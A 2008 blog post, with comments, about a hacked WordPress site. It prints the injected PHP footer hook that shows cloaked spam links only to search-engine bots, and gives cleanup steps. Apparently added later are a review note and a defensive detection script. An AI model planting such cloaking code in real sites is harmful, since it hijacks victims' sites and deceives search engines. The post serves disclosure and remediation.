Pocket SEO Was Hacked :(

PocketSEO.com suddenly dropped in the SERPs so I did some investigating.

It turns out that my site was hacked and a backdoor was installed. Someone was inserting cloaked porn links in the footer.

Here is what happens when you search Google for site:pocketseo.com porn. Until today I had a noarchive meta tag so this is the only way to view it.

click here for a screenshot (explicit words blacked out)

The hacker uploaded some files that included a function called wpc7c16b8466d864eeefd20050625c7775() that added cloaked links to the site.

This is partial output of a diff run on the site - it comes from a new file called class-mail.php:

+
+add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
+function wpc7c16b8466d864eeefd20050625c7775() {
+	$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
+	$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
+	if(!($sebot==1 && sizeof($_COOKIE)==0)) return;
+	@include('./wp-includes/class-mail.php');
+	if(sizeof($wparr)>0){
+		shuffle($wparr);
+		echo "<div id=\"_wp_footer\">";
+		foreach($wparr as $k=>$v){
+			echo "<a href=\"".$v['url']."\" title=\"".ucwords($v['key'])."\">".ucwords($v['key'])."</a>\n";
+			if($i++==$inum) break;
+		}
+		echo "</div>".$_footer;
+	}
+}
+
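
Review bot: the gate `if(!($sebot==1 && sizeof($_COOKIE)==0)) return;` means the footer block is only emitted for requests whose User-Agent contains one of the strings in `$seau` and that send no cookies, so loading the page in an ordinary browser will not show the links. Verify a cleanup by comparing the footer HTML served to a cookie-less request with one of those User-Agent strings against what a browser receives. In the visible lines `$i`, `$inum` and `$_footer` are never set and `$wparr` is expected to come from the `@include`, whose `@` hides any error. The hook should therefore be removed together with the included `class-mail.php`, and the rest of the tree searched for other `add_action('wp_footer', ...)` registrations that point at similarly random-looking function names.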

Other Victims

Here are a few other sites that mention the problem:

I’ve upgraded WordPress, and filed a reinclusion request with Google. Lesson learned: always stay updated with the latest version of WordPress…

UPDATE: 22 March 2008

Google’s “bad news” response to my reinclusion request:

March 20, 2008

We’ve received a request from a site owner to reconsider the following site for inclusion in our index: http://pocketseo.com/

We’ll review the site. If we find that it’s no longer in violation of our Webmaster Guidelines, we’ll reinclude the site in our index. Please allow several weeks for the reconsideration request. We do review all requests, but unfortunately we can’t reply individually to each request.

9 Comments

  1. Posted March 20, 2008 at 3:19 am | Permalink

    Use a blog system that has a dedicated security team, like Drupal.
    WordPress kicks out new versions all the time without fixing old security issues.

  2. Posted March 20, 2008 at 3:24 am | Permalink

    I am normally a Drupal user. PocketSEO.com was just an experiment to become more familiar with WordPress. I prefer Drupal.

    It was partly my fault for running WordPress 2.1.3 until today. I just upgraded to the latest version (2.3.3).

  3. Posted March 20, 2008 at 6:32 am | Permalink

    Josh, I got hacked a couple months ago by someone inserting posts with cell phone ads. They were making the post dates old so they would be mixed in months back. I just happened to be looking at WassUp plugin at the same time they were making the posts. They only got about three in before I found them and deleted them all. Then changed my password and upgraded.

    It is a never ending battle between hackers/spammers and site owners.

  4. Posted March 20, 2008 at 6:34 am | Permalink

    BTW, it is always a good idea to do searches like you did above every once in a while.

  5. Posted March 20, 2008 at 6:40 am | Permalink

    I just happened to be looking at WassUp plugin at the same time they were making the posts. They only got about three in before I found them and deleted them all.

    That was lucky. I don’t post here often at the moment and I missed it for at least a couple of weeks - maybe longer. I lost my Google rankings.

    BTW, it is always a good idea to do searches like you did above every once in a while.

    I set up Google Alerts for it after it happened. Example:
    site:pocketseo.com porn

  6. Posted March 23, 2008 at 9:37 pm | Permalink

    Just happened to us! My bad for not updating. It would be really useful if you could explain how to fix it here. Thanks.

  7. Posted March 23, 2008 at 10:45 pm | Permalink

    It would be really useful if you could explain how to fix it here.

    Here are the steps to fix it:

    1. Back up all of your files and database
    2. It’s a good idea to make sure that your backup works by installing it locally
    3. I ran a diff on my hacked version of WP vs. a clean version of WP. To run diff, make a directory with two subdirectories. Put your hacked site in one and a clean copy of the same version of WP in the other. Then in the Linux terminal type diff -rup >output.txt. The file called “output.txt” will show a list of all changes between your hacked version of WP and a clean copy of WP. If you aren’t running Linux, you could either use an Ubuntu live CD or install Linux on an external hard drive. Three other methods for running diff are to do it remotely over SSH, to run Mac OS X, or install Cygwin on Windows.
    4. Delete all of your remote WordPress files. You can temporarily put a blank index.html while upgrading so that people can’t read your directory.
    5. Go into phpMyAdmin and search your database for keywords like porn and ringtones just to make sure nothing was injected into the database.
    6. Upgrade to the latest version of WordPress, including uploading your customized files, including config.php, plugins, etc.
    7. Change your WordPress password and FTP password
    8. Then be sure to follow these steps.

    Hope that helps…
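
A scripted form of the diff step from comment 7, added here as an example and not taken from the post: it lists files that are new or changed relative to a clean copy of the same WordPress version, and flags PHP files that hook wp_footer while checking HTTP_USER_AGENT, the pattern in the injected code shown earlier. The directory names clean/ and site/, the function names and the sample file contents are constructed for illustration.

```shell
# Added example. Directory names (clean/, site/) and function names are hypothetical.

# Build two small constructed trees so the example runs offline.
make_sample_trees() {  # usage: make_sample_trees ROOT
  mkdir -p "$1/clean/wp-includes" "$1/site/wp-includes"
  printf '<?php\n// core file\n' > "$1/clean/wp-includes/functions.php"
  printf '<?php\n// core file\n// edited\n' > "$1/site/wp-includes/functions.php"
  printf '<?php\n// same in both\n' | tee "$1/clean/index.php" > "$1/site/index.php"
  # Constructed stand-in for an injected file: footer hook gated on User-Agent.
  cat > "$1/site/wp-includes/class-mail.php" <<'EOF'
<?php
add_action('wp_footer','wp_example_hook');
function wp_example_hook() {
  if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), 'google') === false) return;
}
EOF
}

# Files that exist in the site tree but not in the clean release.
added_files() {  # usage: added_files CLEAN_DIR SITE_DIR
  ( cd "$2" && find . -type f | sort ) | while IFS= read -r f; do
    [ -e "$1/$f" ] || printf '%s\n' "${f#./}"
  done
}

# Files present in both trees whose contents differ.
changed_files() {  # usage: changed_files CLEAN_DIR SITE_DIR
  ( cd "$2" && find . -type f | sort ) | while IFS= read -r f; do
    if [ -f "$1/$f" ] && ! cmp -s "$1/$f" "$2/$f"; then printf '%s\n' "${f#./}"; fi
  done
}

# PHP files that both hook wp_footer and inspect the User-Agent header.
cloaking_suspects() {  # usage: cloaking_suspects SITE_DIR
  find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
    if grep -qF 'HTTP_USER_AGENT' "$f" &&
       grep -qE "add_action\( *['\"]wp_footer" "$f"; then
      printf '%s\n' "${f#"$1"/}"
    fi
  done
}

# Full recursive diff, as in step 3; -N is added so new files appear in full.
full_diff() {  # usage: full_diff CLEAN_DIR SITE_DIR OUTPUT_FILE
  diff -rupN "$1" "$2" > "$3" || [ $? -eq 1 ]   # exit 1 only means "differences found"
}

root=$(mktemp -d); make_sample_trees "$root"   # demo on the constructed trees
added_files "$root/clean" "$root/site"; cloaking_suspects "$root/site"
```

Run the functions against a backup copy of the site rather than the live document root, and review every path reported by added_files and changed_files before restoring customized files.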

  8. Posted March 27, 2008 at 10:12 pm | Permalink

    Just had the same thing happen to me, didn’t even get time to rectify the hackery before Google vaped the entire site from its index.

    I think it’s time for a move to Drupal.

  9. Posted March 27, 2008 at 11:32 pm | Permalink

    @Mo

    Drupal is great. Most of what I do is Drupal. This PocketSEO.com blog was just a WordPress experiment.

3 Trackbacks

  1. […] wrote a post yesterday about how PocketSEO.com was hacked. This site has been heavily penalized because cloaked, hidden porn links were being injected into […]

  2. […] was cleaning out spam comments today, thinking about how this site got hacked a few days ago. Most of the spam comments that bypass Akismet on this site link to pages full of […]

  3. […] mentioned on the 20th, PocketSEO.com was hacked and penalized by Google. I submitted a reinclusion request the same day that I discovered the […]
